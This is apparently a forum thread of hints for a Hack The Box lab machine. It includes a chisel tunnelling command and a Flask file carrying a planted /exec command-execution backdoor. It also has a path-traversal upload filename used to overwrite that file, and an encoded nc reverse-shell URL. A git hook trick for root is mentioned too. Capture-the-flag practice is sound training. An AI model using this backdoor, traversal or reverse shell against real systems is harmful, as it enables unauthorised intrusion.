Posts: 40 Threads: 0 Joined: N/A (May 22, 2022, 01:42 AM)Exited3n Wrote: (May 22, 2022, 12:29 AM)ryzen Wrote: How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go
./chisel client -v 10.10.16.22:8000 R:127.0.0.1:3000:172.17.0.1:30 Thanks a lot! Wondering how you found port 3000. I tried running my own port scans but nothing seemed to work. Did I miss this info in the source code or something? Posts: 22 Threads: 0 Joined: N/A (May 21, 2022, 10:21 PM)dude4695 Wrote: For Root There is Cron:
2022/05/21 22:15:01 CMD: UID=0 PID=19179 | /usr/lib/git-core/git-remote-http origin http://opensource.htb:3000/dev01/home-backup.git could someone help me with root? Posts: 23 Threads: 0 Joined: N/A (May 22, 2022, 01:55 AM)ryzen Wrote: (May 22, 2022, 01:42 AM)Exited3n Wrote: (May 22, 2022, 12:29 AM)ryzen Wrote: How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go
./chisel client -v 10.10.16.22:8000 R:127.0.0.1:3000:172.17.0.1:30
Thanks a lot! Wondering how you found port 3000. I tried running my own port scans but nothing seemed to work. Did I miss this info in the source code or something? PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp filtered ppp
Posts: 40 Threads: 0 Joined: N/A (May 22, 2022, 02:04 AM)Exited3n Wrote: (May 22, 2022, 01:55 AM)ryzen Wrote: (May 22, 2022, 01:42 AM)Exited3n Wrote: (May 22, 2022, 12:29 AM)ryzen Wrote: How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go
./chisel client -v 10.10.16.22:8000 R:127.0.0.1:3000:172.17.0.1:30
Thanks a lot! Wondering how you found port 3000. I tried running my own port scans but nothing seemed to work. Did I miss this info in the source code or something?
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp filtered ppp
Eh. I'm an idiot. My nmap never completed. I got sucked into rabbitholes while waiting lol Posts: 13 Threads: 0 Joined: N/A I'm trying to figure how to get Chisel on docker image can anybody help me Posts: 40 Threads: 0 Joined: N/A (May 22, 2022, 02:15 AM)2341 Wrote: I'm trying to figure how to get Chisel on docker image can anybody help me sinple wget worked for me. Port 80 wouldn't work though for some reason, so I had to host my server on 8000 Posts: 23 Threads: 0 Joined: N/A (May 22, 2022, 02:15 AM)2341 Wrote: I'm trying to figure how to get Chisel on docker image can anybody help me via Upload form! :) Posts: 17 Threads: 0 Joined: N/A You dont need chisyel, you can do it all through wget with swagger api on gittea or just use ssh key someone has posted original Posts: 8 Threads: 0 Joined: N/A I had no clue what I was doing with chisel - owe you folks for getting me to user. root was pretty easy imo. thanks for steering me towards pspy @ dude4695I just created a pre-commit hook inside dev01's git dir to cat the flag to an accessible location Posts: 46 Threads: 0 Joined: N/A (May 22, 2022, 06:08 AM)jon01 Wrote: (May 21, 2022, 08:32 PM)dude4695 Wrote: in views.py
import os
from app.utils import get_file_name
from flask import render_template, request, send_file
from app import app
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
f = request.files['file']
file_name = get_file_name(f.filename)
file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
f.save(file_path)
return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
return render_template('upload.html')
@app.route('/uploads/<path:path>')
def send_report(path):
path = get_file_name(path)
return send_file(os.path.join(os.getcwd(), "public", "uploads", path))
@app.route('/exec')
def runcmd():
return os.system(request.args.get('cmd'))
in burpsuite change this
Content-Disposition: form-data; name="file"; filename="..//app/app/views.py"
in browser
http://IP/exec?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20IP%20PORT%20%3E%2Ftmp%2Ff
you'll get rev shell of container
you have to just replace views.py file
not getting revshell : it giving me error what error ? |
